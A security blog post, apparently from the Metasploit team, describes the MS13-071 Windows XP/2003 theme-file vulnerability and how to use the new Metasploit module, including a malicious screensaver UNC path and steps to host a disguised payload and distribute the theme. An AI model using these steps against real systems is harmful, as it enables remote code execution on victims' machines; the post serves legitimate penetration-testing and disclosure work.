Recently we've added an exploit for MS13-071 to Metasploit. Rated as "Important" by Microsoft, this remote code execution, found by Eduardo Prado, for Windows XP and Windows 2003 environments is achieved by handling specially crafted themes. In this blog post we would like to discuss the vulnerability and give some helpful tips for exploiting it from Metasploit.
First of all, the bug occurs while handling the [boot] section on .theme files, where an arbitrary path can be used as screen saver:
Since SCR files are just Windows executables, the vulnerability can be exploited by locating a malicious EXE on a shared folder, and distributing a malicious .theme referencing the remote screen saver, for example "SCRNSAVE.EXE=\\host\share\exploit.scr". When the victim opens the .theme and visits the Screen Saver tab the payload will be executed:
The code execution is also triggered if the victim installs the malicious theme and stays away from the computer, when Windows tries to display the screensaver.
In order to solve it, the Microsoft patch adds a new function, EnsureInfoxScreenSaver(), which tries to verify the screen saver path:
With the vulnerability analyzed, writing a file format exploit and exploit it isn't hard if you take two things into account:
- There is a malicious .theme file which the victim must open
- There is a payload embedded into an exe, and masked as scr, which must be distributed through a shared folder.
That said, we're going to see how to use the current Metasploit, which allows two operation modes:
- Use an external shared resource (Samba Server or Windows shared folder) to deploy the malicious screen saver. In this case:
1) Configure the UNCPATH option:
2) Deploy the payload, embedded into an exe, on the UNCPATH location:
3) Finally run a handler for the payload, distribute the malicious .theme file (generated on 1) ) and wait for sessions:
- Use the embedded SMBServer support into the module. In this case, just configure the SRVHOST option to listen on an address reachable by the victims, and let the embedded SMBServer mixin to work. Distribute the .theme file and wait for the sessions:
The SMBServer mixin needs (root) privileges to bind to the port 445/TCP. It will also fail if the port is busy (common on Windows environments or Samba servers). Since the code overriding the SMBServer mixin is brand new, I'd love to hear from you if it worked for you. Remember it has been tested only for Windows XP SP3 and Windows 2003 SP2 - the currents targets for this exploit.
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments